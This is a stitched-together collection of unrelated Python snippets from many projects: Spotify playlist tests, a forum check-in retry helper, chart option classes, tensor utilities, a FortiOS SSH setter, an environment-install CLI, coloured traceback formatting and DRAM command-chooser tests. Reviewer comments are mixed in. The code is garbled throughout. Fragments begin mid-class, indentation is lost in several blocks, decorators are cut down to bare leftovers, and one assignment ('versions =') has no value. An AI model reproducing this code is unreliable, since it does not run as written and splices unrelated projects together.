                if (self.xid != None):
                    q.text(('%#x' % self.xid))
                else:
                    q.text('None')
                q.text(',')
                q.breakable()
                q.text('flags = ')
                value_name_map = {1: 'OFPSF_REQ_MORE'}
                q.text(util.pretty_flags(self.flags, value_name_map.values()))
                q.text(',')
                q.breakable()
                q.text('port_no = ')
                q.text(util.pretty_port(self.port_no))
                q.text(',')
                q.breakable()
                q.text('queue_id = ')
                q.text(('%#x' % self.queue_id))
            q.breakable()
        q.text('}')
class TestSpotifyPlaylistModify():
    """End-to-end test of playlist mutation endpoints against the live API.

    FIX: removed the redundant ``except Exception: raise`` clause — it
    re-raised unchanged, so ``try/finally`` alone gives identical behavior
    (the playlist is always unfollowed for cleanup).
    """

    def test_playlist_modifications(self, user_client, current_user_id):
        # Create a throwaway playlist; everything below mutates it and the
        # finally-block deletes (unfollows) it regardless of outcome.
        playlist = user_client.playlist_create(current_user_id, 'tekore-test', public=False, description='Temporary test playlist for Tekore')
        assert (playlist is not None)
        track_uris = [to_uri('track', id_) for id_ in track_ids]
        try:
            user_client.playlist_cover_image_upload(playlist.id, image)
            new_name = 'tekore-test-modified'
            user_client.playlist_change_details(playlist.id, name=new_name, description='Temporary test playlist for Tekore (modified)')
            playlist = user_client.playlist(playlist.id)
            assert (playlist.name == new_name)
            # Add in reverse order, then replace with the forward order.
            user_client.playlist_add(playlist.id, track_uris[::(- 1)])
            assert_items_equal(user_client, playlist.id, track_uris[::(- 1)])
            user_client.playlist_replace(playlist.id, track_uris)
            assert_items_equal(user_client, playlist.id, track_uris)
            # Reorder twice: swap the first two tracks, then swap them back
            # using the snapshot id from the first reorder.
            snapshot = user_client.playlist_reorder(playlist.id, range_start=1, insert_before=0)
            assert_items_equal(user_client, playlist.id, ([track_uris[1], track_uris[0]] + track_uris[2:]))
            user_client.playlist_reorder(playlist.id, range_start=1, insert_before=0, snapshot_id=snapshot)
            assert_items_equal(user_client, playlist.id, track_uris)
            user_client.playlist_remove(playlist.id, track_uris)
            items = user_client.playlist_items(playlist.id)
            assert (items.total == 0)
            # Removal by (uri, index) occurrences: duplicates at the tail survive.
            new_tracks = (track_uris + track_uris[::(- 1)])
            user_client.playlist_replace(playlist.id, new_tracks)
            user_client.playlist_remove_occurrences(playlist.id, [(uri, ix) for (ix, uri) in enumerate(track_uris)])
            assert_items_equal(user_client, playlist.id, track_uris[::(- 1)])
            # Removal by bare indices, pinned to a snapshot id.
            new_tracks = (track_uris + track_uris[::(- 1)])
            user_client.playlist_replace(playlist.id, new_tracks)
            playlist = user_client.playlist(playlist.id)
            user_client.playlist_remove_indices(playlist.id, list(range(len(track_uris))), playlist.snapshot_id)
            assert_items_equal(user_client, playlist.id, track_uris[::(- 1)])
            user_client.playlist_clear(playlist.id)
            assert_items_equal(user_client, playlist.id, [])
            cover = user_client.playlist_cover_image(playlist.id)
            assert (len(cover) > 0)
        finally:
            # Always clean up the temporary playlist.
            user_client.playlist_unfollow(playlist.id)
def hostloc_checkin_retry(account, retry=3, strage='local', show_secret=False):
    """Run hostloc_checkin with up to *retry* retries on failure.

    A RemoteDisconnected aborts immediately (server hung up; retrying is
    pointless).  Other exceptions are logged and retried after a back-off
    whose length depends on the storage backend.

    BUG FIX: the original ignored the ``strage`` parameter and always
    passed the hard-coded ``strage='local'`` to ``hostloc_checkin``; the
    caller's choice is now forwarded.
    """
    while True:
        try:
            hostloc_checkin(account, strage=strage, show_secret=show_secret)
            break
        except RemoteDisconnected:
            logger.debug('')
            break
        except Exception as e:
            logger.exception(e)
            if (retry == 0):
                logger.debug('')
                break
            retry -= 1
            # Shorter back-off on the cloud ('tencent') runner, longer locally.
            n = 10 if (strage == 'tencent') else 20
            logger.debug('%s', n)
            time.sleep(n)
class OptionSeriesBulletSonificationTracksMappingPitch(Options):
    """Option proxy for the sonification pitch mapping of bullet series.

    BUG FIX: the original declared each getter/setter pair as two plain
    methods with the same name, so the second ``def`` silently shadowed
    the first and every getter (with its documented default) was
    unreachable dead code.  Restored the property protocol
    (``@property`` + ``@<name>.setter``) used by this option-class pattern.
    """

    @property
    def mapFunction(self):
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        # Defaults to mapping pitch from the 'y' value.
        return self._config_get('y')

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        # Default upper note: C6.
        return self._config_get('c6')

    @max.setter
    def max(self, text: str):
        self._config(text, js_type=False)

    @property
    def min(self):
        # Default lower note: C2.
        return self._config_get('c2')

    @min.setter
    def min(self, text: str):
        self._config(text, js_type=False)

    @property
    def scale(self):
        return self._config_get(None)

    @scale.setter
    def scale(self, value: Any):
        self._config(value, js_type=False)

    @property
    def within(self):
        # Default: map within the y-axis extremes.
        return self._config_get('yAxis')

    @within.setter
    def within(self, text: str):
        self._config(text, js_type=False)
# NOTE(review): the bare "_ordering" below looks like the residue of a
# stripped decorator — presumably functools.total_ordering; confirm in VCS.
_ordering
class ForkCriteria(ABC):
    """Abstract criterion for when a fork activates.

    Instances compare and hash via ``_internal``, a (kind, value) tuple
    where kind is one of the class constants below — so all block-number
    criteria sort before timestamp criteria, which sort before unscheduled.
    """
    # Discriminant values for _internal[0]; numeric order defines sort order.
    BLOCK_NUMBER: Final[int] = 0
    TIMESTAMP: Final[int] = 1
    UNSCHEDULED: Final[int] = 2
    # (kind, threshold) pair used for all comparisons and hashing.
    _internal: Tuple[(int, int)]
    def __eq__(self, other: object) -> bool:
        # Only comparable against other ForkCriteria; otherwise defer.
        if isinstance(other, ForkCriteria):
            return (self._internal == other._internal)
        return NotImplemented
    def __lt__(self, other: object) -> bool:
        if isinstance(other, ForkCriteria):
            return (self._internal < other._internal)
        return NotImplemented
    def __hash__(self) -> int:
        # Consistent with __eq__: both delegate to _internal.
        return hash(self._internal)
    def check(self, block_number: int, timestamp: int) -> bool:
        # Abstract: subclasses decide whether the fork is active at this
        # block number / timestamp.  (Likely had @abstractmethod stripped.)
        ...
    def __repr__(self) -> str:
        # Subclasses must provide their own representation.
        raise NotImplementedError()
class _ComposedProperty(object):
def __init__(self, name):
self.name = name
def __get__(self, instance, owner):
return getattr(instance.real, self.name)
def __set__(self, instance, value):
return setattr(instance.real, self.name, value)
def __delete__(self, instance):
return delattr(instance.real, self.name) |
def test_get_font_metrics(fx_asset):
    """Font metrics scale with text length, and multiline mode reports a
    narrower but taller bounding box for wrapped text."""
    with Image(width=144, height=192, background=Color('#fff')) as img:
        with Drawing() as draw:
            draw.font = str(fx_asset.joinpath('League_Gothic.otf'))
            draw.font_size = 13
            # Single-line mode: the newline does not reduce the width.
            single = draw.get_font_metrics(img, 'asdf1234')
            double = draw.get_font_metrics(img, 'asdf1234asdf1234')
            wrapped = draw.get_font_metrics(img, 'asdf1234\nasdf1234')
            assert single.character_width == draw.font_size
            assert single.text_width < double.text_width
            assert double.text_width <= wrapped.text_width
            assert double.text_height == wrapped.text_height
            # Multiline mode (third arg True): the newline wraps the text,
            # shrinking the width and growing the height.
            m_single = draw.get_font_metrics(img, 'asdf1234', True)
            m_double = draw.get_font_metrics(img, 'asdf1234asdf1234', True)
            m_wrapped = draw.get_font_metrics(img, 'asdf1234\nasdf1234', True)
            assert m_single.character_width == draw.font_size
            assert m_single.text_width < m_double.text_width
            assert m_double.text_width > m_wrapped.text_width
            assert m_double.text_height < m_wrapped.text_height
class DeleteSubExtension(Extension):
    """Markdown extension adding ``~~delete~~`` and ``~subscript~`` syntax."""

    def __init__(self, *args, **kwargs):
        # Config schema: [default, help-text] per option.
        self.config = {'smart_delete': [True, 'Treat ~~connected~~words~~ intelligently - Default: True'], 'delete': [True, 'Enable delete - Default: True'], 'subscript': [True, 'Enable subscript - Default: True']}
        super().__init__(*args, **kwargs)

    def extendMarkdown(self, md):
        """Register the tilde processors matching the enabled features."""
        config = self.getConfigs()
        enable_delete = bool(config.get('delete', True))
        enable_subscript = bool(config.get('subscript', True))
        smart = bool(config.get('smart_delete', True))
        md.registerExtension(self)
        # '~' must be escapable whenever either feature is on; subscript
        # additionally allows escaped spaces inside the span.
        escape_chars = []
        if enable_delete or enable_subscript:
            escape_chars.append('~')
        if enable_subscript:
            escape_chars.append(' ')
        util.escape_chars(md, escape_chars)
        # Neutralize tildes that are not part of a recognized span.
        md.inlinePatterns.register(SimpleTextInlineProcessor(NOT_TILDE), 'not_tilde', 70)
        # Pick the processor for the enabled feature combination.
        processor = None
        if enable_delete and enable_subscript:
            processor = TildeSmartProcessor('~') if smart else TildeProcessor('~')
        elif enable_delete:
            processor = TildeSmartDeleteProcessor('~') if smart else TildeDeleteProcessor('~')
        elif enable_subscript:
            processor = TildeSubProcessor('~')
        if processor is not None:
            md.inlinePatterns.register(processor, 'sub_del', 65)
def assert_default_errors(errors, include_ingress_errors=True):
    """Assert *errors* starts with the standard Ambassador CRD-missing
    error table; any remaining entries must be invalid-port errors."""
    messages = ['Ambassador could not find core CRD definitions. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...', 'Ambassador could not find Resolver type CRD definitions. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...', 'Ambassador could not find the Host CRD definition. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...', 'Ambassador could not find the LogService CRD definition. Please visit for more information. You can continue using Ambassador via Kubernetes annotations, any configuration via CRDs will be ignored...']
    if include_ingress_errors:
        messages.append('Ambassador is not permitted to read Ingress resources. Please visit for more information. You can continue using Ambassador, but Ingress resources will be ignored...')
    # Errors are (source, message) pairs with an empty source.
    default_errors = [['', message] for message in messages]
    expected_count = len(default_errors)
    if (errors[:expected_count] != default_errors):
        assert False, f'''default error table mismatch: got
{errors}'''
    for error in errors[expected_count:]:
        assert ('found invalid port' in error[1]), "Could not find 'found invalid port' in the error {}".format(error[1])
def jagged_to_dense(jagged: torch.Tensor, offsets_list: List[torch.Tensor], dense_shape: List[int], padding_value: float=0.0) -> torch.Tensor:
    """Scatter a jagged tensor into a dense tensor of *dense_shape*,
    filling untouched positions with *padding_value*.

    Each 1-D tensor in *offsets_list* describes one jagged dimension
    (CSR-style offsets); together with the leading batch dimension they
    replace the first ``1 + len(offsets_list)`` axes of *dense_shape*.
    The trailing axes of *jagged* must match the trailing axes of
    *dense_shape* exactly.
    """
    assert all(((t.dim() == 1) for t in offsets_list))
    # Work with plain Python lists from here on.
    offsets_list = [list(t.cpu().numpy()) for t in offsets_list]
    _check_offsets(offsets_list)
    # One dense axis per jagged (offsets) level, plus the batch axis.
    assert ((len(dense_shape) - len(jagged.shape)) == len(offsets_list))
    assert (jagged.shape[1:] == tuple(dense_shape[(1 + len(offsets_list)):]))
    for (i, offsets) in enumerate(offsets_list):
        dense_dim = dense_shape[(i + 1)]
        for j in range(1, len(offsets)):
            # Every jagged row must fit within its dense dimension.
            assert ((offsets[j] - offsets[(j - 1)]) <= dense_dim)
    dtype = torch_dtype_to_string(jagged.dtype)
    result = get_torch_full_tensor(shape=dense_shape, fill_value=padding_value, dtype=dtype)
    total_length = jagged.shape[0]
    # Copy row by row: map each flat jagged index to its dense coordinates.
    # O(total_length) Python loop — presumably a reference implementation,
    # not a hot path; confirm before using on large inputs.
    for jagged_idx in range(total_length):
        dense_idx = _jagged_idx_to_dense_idx(jagged_idx=jagged_idx, offsets_list=offsets_list)
        result[tuple(dense_idx)] = jagged[jagged_idx]
    return result
def generate_predictable_pipeline_id(application_name, pipeline_name):
    """Derive a deterministic pipeline UUID (uuid5) from the application
    and pipeline names, so repeated runs produce the same id."""
    seed = application_name + pipeline_name
    LOG.debug("Generating pipeline id '%s' using namespace '%s' and seed '%s'", pipeline_name, _foremast_uuid_namespace, seed)
    return uuid.uuid5(_foremast_uuid_namespace, seed)
def _apply_dict_type(value, key_type=None, value_type=None):
if ((not key_type) and (not value_type)):
return dict(value)
key_type = (key_type or _identity_function)
value_type = (value_type or _identity_function)
return {key_type(key): value_type(value) for (key, value) in value.items()} |
def firewall_ssh_setting(data, fos):
    """Push the firewall.ssh 'setting' configuration to FortiOS.

    Filters the module parameters down to the supported fields, converts
    underscored names to the hyphenated API form, and issues the set call
    against the requested VDOM.
    """
    vdom = data['vdom']
    raw_settings = data['firewall_ssh_setting']
    payload = underscore_to_hyphen(filter_firewall_ssh_setting_data(raw_settings))
    return fos.set('firewall.ssh', 'setting', data=payload, vdom=vdom)
# NOTE(review): the bare lines below look like the residue of stripped
# click decorators (a group/command call plus six option declarations);
# confirm against VCS before relying on this as a CLI entry point.
()
_option
_option
_option
_option
_option
_option
def install(edm, runtime, toolkit, environment, editable, source):
    """Create an EDM environment and install the project plus its
    runtime/toolkit-specific dependencies into it."""
    parameters = get_parameters(edm, runtime, toolkit, environment)
    # Union of the base deps with the per-toolkit and per-runtime extras.
    packages = ' '.join(((dependencies | toolkit_dependencies.get(toolkit, set())) | runtime_dependencies.get(runtime, set())))
    commands = ['{edm} environments create {environment} --force --version={runtime}', ('{edm} --config edm.yaml install -y -e {environment} ' + packages)]
    # PyPI-only deps are pip-installed inside the environment.
    commands.extend([('{edm} run -e {environment} -- pip install ' + dep) for dep in pypi_dependencies])
    click.echo("Creating environment '{environment}'".format(**parameters))
    execute(commands, parameters)
    if source:
        # Replace selected EDM packages with their GitHub source versions.
        cmd_fmt = '{edm} plumbing remove-package --environment {environment} --force '
        commands = [(cmd_fmt + source_pkg) for source_pkg in source_dependencies]
        execute(commands, parameters)
        source_pkgs = [github_url_fmt.format(pkg) for pkg in source_dependencies]
        commands = ['python -m pip install --force-reinstall {pkg}'.format(pkg=pkg) for pkg in source_pkgs]
        commands = [('{edm} run -e {environment} -- ' + command) for command in commands]
        execute(commands, parameters)
    # Finally install this project itself (editable if requested), without
    # dependencies since those were installed above.
    if editable:
        install_cmd = '{edm} run -e {environment} -- python -m pip install --editable . --no-dependencies'
    else:
        install_cmd = '{edm} run -e {environment} -- python -m pip install . --no-dependencies'
    execute([install_cmd], parameters)
    click.echo('Done install')
class Color():
    """ANSI color helper: callable to produce escape codes, plus pretty
    printers for dicts/sequences and colorized traceback formatting."""
    def __call__(self, color_str: str=None) -> str:
        """Return the ANSI escape sequence for *color_str* ('color' or
        'modifier color'); empty string when colors are disabled, reset
        code when no color is given or lookup fails."""
        if (not CONFIG.settings['console']['show_colors']):
            return ''
        if (not color_str):
            return (BASE + 'm')
        try:
            if (' ' not in color_str):
                return f'{BASE}{COLORS[color_str]}m'
            (modifier, color_str) = color_str.split()
            return f'{BASE}{MODIFIERS[modifier]}{COLORS[color_str]}m'
        except (KeyError, ValueError):
            # Unknown color/modifier: fall back to the reset sequence.
            return (BASE + 'm')
    def __str__(self):
        # str(Color()) is the reset sequence, used to end colored spans.
        return (BASE + 'm')
    def pretty_dict(self, value: Dict, _indent: int=0) -> str:
        """Render *value* as an indented, brace-delimited multiline string,
        recursing into nested dicts and sequences.  *_indent* is internal."""
        text = ''
        if (not _indent):
            text = '{'
        _indent += 4
        # Keys sorted by their string form for a stable rendering.
        for (c, k) in enumerate(sorted(value.keys(), key=(lambda k: str(k)))):
            if c:
                text += ','
            s = ("'" if isinstance(k, str) else '')
            text += f'''
{(' ' * _indent)}{s}{k}{s}: '''
            if isinstance(value[k], dict):
                text += ('{' + self.pretty_dict(value[k], _indent))
                continue
            if isinstance(value[k], (list, tuple, set)):
                text += (str(value[k])[0] + self.pretty_sequence(value[k], _indent))
                continue
            text += self._write(value[k])
        _indent -= 4
        text += f'''
{(' ' * _indent)}}}'''
        return text
    def pretty_sequence(self, value: Sequence, _indent: int=0) -> str:
        """Render a list/tuple/set with the original bracket style; dicts
        and 64-char strings (presumably tx hashes) get one item per line."""
        text = ''
        brackets = (str(value)[0], str(value)[(- 1)])
        if (not _indent):
            text += f'{brackets[0]}'
        if (value and (not [i for i in value if (not isinstance(i, dict))])):
            # All items are dicts: render each on its own indented block.
            text += f'''
{(' ' * (_indent + 4))}{{'''
            text += f''',
{(' ' * (_indent + 4))}{{'''.join((self.pretty_dict(i, (_indent + 4)) for i in value))
            text += f'''
{(' ' * _indent)}{brackets[1]}'''
        elif (value and (not [i for i in value if ((not isinstance(i, str)) or (len(i) != 64))])):
            # All items are 64-char strings: one per line.
            text += ', '.join((f'''
{(' ' * (_indent + 4))}{self._write(i)}''' for i in value))
            text += f'''
{(' ' * _indent)}{brackets[1]}'''
        else:
            text += ', '.join((self._write(i) for i in value))
            text += brackets[1]
        return text
    def _write(self, value):
        # Quote strings, leave everything else bare.
        s = ('"' if isinstance(value, str) else '')
        return f'{s}{value}{s}'
    def format_tb(self, exc: Exception, filename: str=None, start: Optional[int]=None, stop: Optional[int]=None) -> str:
        """Return a colorized traceback for *exc*, optionally trimmed to
        the frames touching *filename* (unless full tb output is forced)."""
        if (isinstance(exc, SyntaxError) and (exc.text is not None)):
            return self.format_syntaxerror(exc)
        tb = [i.replace('./', '') for i in traceback.format_tb(exc.__traceback__)]
        if (filename and (not CONFIG.argv['tb'])):
            try:
                # Keep only frames between the first and last mention of filename.
                start = tb.index(next((i for i in tb if (filename in i))))
                stop = (tb.index(next((i for i in tb[::(- 1)] if (filename in i)))) + 1)
            except Exception:
                pass
        tb = tb[start:stop]
        for i in range(len(tb)):
            # Each frame is 'File ..., line N, in fn' plus the source line.
            (info, code) = tb[i].split('\n')[:2]
            info = info.replace(base_path, '.')
            info_lines = [x.strip(',') for x in info.strip().split(' ')]
            if ('site-packages/' in info_lines[1]):
                info_lines[1] = ('"' + info_lines[1].split('site-packages/')[1])
            tb[i] = f" {self('dark white')}File {self('bright magenta')}{info_lines[1]}{self('dark white')}, line {self('bright blue')}{info_lines[3]}{self('dark white')}, in {self('bright cyan')}{info_lines[5]}{self}"
            if code:
                tb[i] += f'''
{code}'''
        msg = str(exc)
        if isinstance(exc, VyperException):
            msg = self.highlight(msg)
            if (not CONFIG.argv['tb']):
                tb.clear()
        from brownie.exceptions import CompilerError
        if isinstance(exc, CompilerError):
            # Compiler output is source code: highlight with a matching lexer.
            if (exc.compiler == 'solc'):
                msg = self.highlight(msg, SolidityLexer())
            else:
                msg = self.highlight(msg)
            if (not CONFIG.argv['tb']):
                tb.clear()
        tb.append(f"{self('bright red')}{type(exc).__name__}{self}: {msg}")
        return '\n'.join(tb)
    def format_syntaxerror(self, exc: SyntaxError) -> str:
        """Colorized rendering of a SyntaxError with a caret under the
        offending column (offset adjusted for stripped leading whitespace)."""
        offset = (((exc.offset + len(exc.text.lstrip())) - len(exc.text)) + 3)
        exc.filename = exc.filename.replace(base_path, '.')
        return f''' {self('dark white')}File "{self('bright magenta')}{exc.filename}{self('dark white')}", line {self('bright blue')}{exc.lineno}{self('dark white')},
{self} {exc.text.strip()}
{(' ' * offset)}^
{self('bright red')}SyntaxError{self}: {exc.msg}'''
    def highlight(self, text, lexer=PythonLexer()):
        """Syntax-highlight *text* with pygments (Python lexer by default)."""
        return pygments.highlight(text, lexer, formatter)
class TestMultipleListenersCleanup(tests.LimitedTestCase):
    """Verifies that killing one of two greenthreads blocked on the same
    file descriptor leaves the hub's listener bookkeeping intact, so the
    surviving reader still gets woken."""
    def setUp(self):
        super().setUp()
        # Two readers on one fd is normally an error; allow it for this test
        # and silence hub exception logging.
        debug.hub_prevent_multiple_readers(False)
        debug.hub_exceptions(False)
    def tearDown(self):
        super().tearDown()
        # Restore the default safety checks.
        debug.hub_prevent_multiple_readers(True)
        debug.hub_exceptions(True)
    def test_cleanup(self):
        (r, w) = os.pipe()
        self.addCleanup(os.close, r)
        self.addCleanup(os.close, w)
        # Non-blocking reads so readfd can trampoline instead of blocking.
        fcntl.fcntl(r, fcntl.F_SETFL, (fcntl.fcntl(r, fcntl.F_GETFL) | os.O_NONBLOCK))
        def readfd(fd):
            while True:
                try:
                    return os.read(fd, 1)
                except OSError as e:
                    if (e.errno != errno.EAGAIN):
                        raise
                    # Nothing to read yet: wait on the hub for readability.
                    hubs.trampoline(fd, read=True)
        first_listener = eventlet.spawn(readfd, r)
        eventlet.sleep()
        second_listener = eventlet.spawn(readfd, r)
        eventlet.sleep()
        # Kill the second listener while it is blocked on the fd.
        hubs.get_hub().schedule_call_global(0, second_listener.throw, eventlet.Timeout(None))
        eventlet.sleep()
        # The first listener must still be registered and receive the byte.
        os.write(w, b'.')
        self.assertEqual(first_listener.wait(), b'.')
def get_next_event(shot: System, *, transition_cache: Optional[TransitionCache]=None, quartic_solver: QuarticSolver=QuarticSolver.HYBRID) -> Event:
    """Return the earliest upcoming event in the shot.

    Candidate events (motion transitions, ball-ball collisions, cushion
    collisions, pocket events) are gathered and the one with the smallest
    time wins; ties keep the earlier candidate in the order below.  When
    nothing is upcoming, the null event (time=inf) is returned.
    """
    if transition_cache is None:
        transition_cache = TransitionCache.create(shot)
    candidates = [
        # Sentinel: returned unchanged if every real candidate is at inf.
        null_event(time=np.inf),
        transition_cache.get_next(),
        get_next_ball_ball_collision(shot, solver=quartic_solver),
        get_next_ball_linear_cushion_collision(shot),
        get_next_ball_circular_cushion_event(shot, solver=quartic_solver),
        get_next_ball_pocket_collision(shot, solver=quartic_solver),
    ]
    # min() keeps the first of equal-time candidates, matching the
    # strict-< replacement logic of a sequential comparison.
    return min(candidates, key=lambda candidate: candidate.time)
def parse_atom_name(name):
    """Normalize a 4-character PDB-style atom name to a capitalized
    element symbol, consulting NAME_MAP / KNOWN_ATOMS for the mapping."""
    original = name
    assert len(name) == 4
    lowered = name.lower()
    # Names listed in FULL_NAME are interpreted whole; otherwise only the
    # first two characters carry the element.
    is_full = lowered in FULL_NAME
    candidate = lowered if is_full else lowered[:2]
    stripped = STRIP_RE.sub('', candidate).lower()
    if is_full:
        stripped = stripped[:2]
    try:
        mapped = NAME_MAP[stripped]
    except KeyError:
        # Not remapped: accept only names already known to be atoms.
        assert (stripped in KNOWN_ATOMS), f"Could not parse atom name '{original}'"
        mapped = stripped
    return mapped.capitalize()
class TreeNodePerformanceTestCase(TransactionTestCase):
    """Times bulk creation of 2000 Category tree nodes.

    FIX: ``settings.DEBUG`` is now restored in a ``finally`` block, so a
    failure inside the timed section no longer leaves DEBUG enabled for
    the remainder of the test run.
    """

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def test_performance(self):
        # DEBUG must be on so the connection records queries for the
        # debug_performance context manager to report.
        settings.DEBUG = True
        try:
            message_prefix = f'[treenode] create {Category.__module__}.{Category.__name__} tree: '
            with debug_performance(message_prefix=message_prefix):
                # Suppress tree-maintenance signals during bulk insert,
                # then rebuild the tree once at the end.
                with no_signals():
                    for i in range(2000):
                        Category.objects.create(name=f'{i}', tn_parent=None, tn_priority=0)
                Category.update_tree()
        finally:
            settings.DEBUG = False
def extractWatashiwasugoidesuCom(item):
    """Build a release message for watashiwasugoidesu.com feed items.

    Returns None for previews / items without a chapter or volume,
    a release message when a known tag matches, and False otherwise.
    """
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or 'preview' in item['title'].lower():
        return None
    # tag -> (release name, translation type), checked in insertion order.
    releases = {'PRC': ('PRC', 'translated'), 'Loiterous': ('Loiterous', 'oel')}
    for tagname, (name, tl_type) in releases.items():
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
# NOTE(review): the three bare lines below look like the residue of
# stripped decorators (hypothesis settings, pytest.mark.usefixtures and a
# parametrization over job_queue_nodes); confirm against VCS.
(suppress_health_check=[HealthCheck.function_scoped_fixture])
.usefixtures('use_tmpdir')
(job_queue_nodes)
def test_that_exclude_host_is_in_the_bsub_resource_request(tmp_path, job_queue_node):
    """An EXCLUDE_HOST queue option must translate into hname!='...' terms
    in the bsub resource request recorded by the mocked submit command."""
    reset_command_queue(tmp_path)
    next_command_output('submit', submit_success_output('LSF', 1))
    queue_config = QueueConfig(job_script=os.path.abspath('script.sh'), queue_system=QueueSystem.LSF, max_submit=2, queue_options={QueueSystem.LSF: [('EXCLUDE_HOST', 'hostname1, hostname2')]})
    driver = Driver.create_driver(queue_config)
    job_queue_node.submit(driver)
    # The mocked submit command records its input here.
    submitinput = Path('submitinput.txt').read_text(encoding='utf-8')
    assert ("hname!='hostname1'" in submitinput)
    assert ("hname!='hostname2'" in submitinput)
def latest_widevine_version(eula=False):
    """Return the latest available Widevine CDM version string.

    For the repo/EULA path the version list is fetched from Google; for
    ARM devices the version comes from the best Chrome OS recovery image.
    """
    if (eula or cdm_from_repo()):
        url = config.WIDEVINE_VERSIONS_URL
        # BUG(review): the right-hand side of this assignment was lost —
        # presumably a fetch of `url` (e.g. http_get(url)); as written this
        # line is a syntax error.  Restore from VCS.
        versions =
        # The versions file lists releases oldest-first; take the last.
        return versions.split()[(- 1)]
    from .arm import chromeos_config, select_best_chromeos_image
    devices = chromeos_config()
    arm_device = select_best_chromeos_image(devices)
    if (arm_device is None):
        log(4, 'We could not find an ARM device in the Chrome OS recovery.json')
        ok_dialog(localize(30004), localize(30005))
        return ''
    return arm_device.get('version')
class TestCommandChooser(unittest.TestCase):
    def test_helper_methods_correct(self):
        """The chooser's write()/read()/activate() helpers must reflect the
        currently selected request type, and accept() must require both a
        matching want_* flag and cmd.ready."""
        def main_generator(dut):
            # Request-type characters and, per helper, which of them should
            # make that helper read as 1 ('_' = no request).
            possible_cmds = '_rwap'
            expected_read = '01000'
            expected_write = '00100'
            expected_activate = '00010'
            helper_methods = {'write': expected_write, 'read': expected_read, 'activate': expected_activate}
            for (method, expected_values) in helper_methods.items():
                with self.subTest(method=method):
                    for (cmd, expected) in zip(possible_cmds, expected_values):
                        # Drive only the first request slot with this cmd type.
                        (yield from dut.set_requests(f'{cmd}___'))
                        (yield)
                        method_value = (yield getattr(dut.chooser, method)())
                        self.assertEqual(method_value, int(expected))
            with self.subTest(method='accept'):
                (yield dut.chooser.want_writes.eq(1))
                (yield)
                # No request pending: accept stays low.
                (yield from dut.set_requests('____'))
                (yield)
                self.assertEqual((yield dut.chooser.accept()), 0)
                # Write request pending but cmd.ready low: valid, not accepted.
                (yield from dut.set_requests('w___'))
                (yield)
                self.assertEqual((yield dut.chooser.accept()), 0)
                self.assertEqual((yield dut.chooser.cmd.valid), 1)
                # Raising ready completes the handshake.
                (yield dut.chooser.cmd.ready.eq(1))
                (yield)
                self.assertEqual((yield dut.chooser.accept()), 1)
        dut = CommandChooserDUT(n_requests=4, bankbits=3, addressbits=13)
        run_simulation(dut, main_generator(dut))
def test_selects_next_when_request_not_valid(self):
def main_generator(dut):
(yield dut.chooser.want_cmds.eq(1))
(yield from dut.set_requests('pppp'))
(yield)
def invalidate(i):
(yield dut.requests[i].valid.eq(0))
(yield)
(yield dut.requests[i].valid.eq(1))
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield from invalidate(0))
self.assertEqual((yield dut.chooser.cmd.ba), 1)
(yield from invalidate(1))
self.assertEqual((yield dut.chooser.cmd.ba), 2)
(yield from invalidate(2))
self.assertEqual((yield dut.chooser.cmd.ba), 3)
(yield from invalidate(3))
self.assertEqual((yield dut.chooser.cmd.ba), 0)
dut = CommandChooserDUT(n_requests=4, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
def test_selects_next_when_cmd_ready(self):
def main_generator(dut):
(yield dut.chooser.want_cmds.eq(1))
(yield from dut.set_requests('pppp'))
(yield)
def cmd_ready():
(yield dut.chooser.cmd.ready.eq(1))
(yield)
(yield dut.chooser.cmd.ready.eq(0))
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield)
self.assertEqual((yield dut.chooser.cmd.ba), 0)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 1)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 2)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 3)
(yield from cmd_ready())
self.assertEqual((yield dut.chooser.cmd.ba), 0)
dut = CommandChooserDUT(n_requests=4, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
def selection_test(self, requests, expected_order, wants):
def main_generator(dut):
for want in wants:
(yield getattr(dut.chooser, want).eq(1))
(yield from dut.set_requests(requests))
(yield)
for (i, expected_index) in enumerate(expected_order):
error_msg = f'requests={requests}, expected_order={expected_order}, i={i}'
if (expected_index == '_'):
cas = (yield dut.chooser.cmd.cas)
ras = (yield dut.chooser.cmd.ras)
we = (yield dut.chooser.cmd.we)
self.assertEqual((cas, ras, we), (0, 0, 0), msg=error_msg)
else:
selected_request_index = (yield dut.chooser.cmd.ba)
self.assertEqual(selected_request_index, int(expected_index), msg=error_msg)
(yield dut.chooser.cmd.ready.eq(1))
(yield)
(yield dut.chooser.cmd.ready.eq(0))
(yield)
assert (len(requests) == 8)
dut = CommandChooserDUT(n_requests=8, bankbits=3, addressbits=13)
run_simulation(dut, main_generator(dut))
('Issue #174')
def test_selects_nothing(self):
requests = 'w_rawpwr'
order = '____'
self.selection_test(requests, order, wants=[])
def test_selects_writes(self):
requests = 'w_rawpwr'
order = '0460460'
self.selection_test(requests, order, wants=['want_writes'])
def test_selects_reads(self):
requests = 'rp_awrrw'
order = '0560560'
self.selection_test(requests, order, wants=['want_reads'])
('Issue #174')
def test_selects_writes_and_reads(self):
requests = 'rp_awrrw'
order = ''
self.selection_test(requests, order, wants=['want_reads', 'want_writes'])
('Issue #174')
def test_selects_cmds_without_act(self):
requests = 'pr_aa_pw'
order = '06060'
self.selection_test(requests, order, wants=['want_cmds'])
def test_selects_cmds_with_act(self):
requests = 'pr_aa_pw'
order = ''
self.selection_test(requests, order, wants=['want_cmds', 'want_activates'])
('Issue #174')
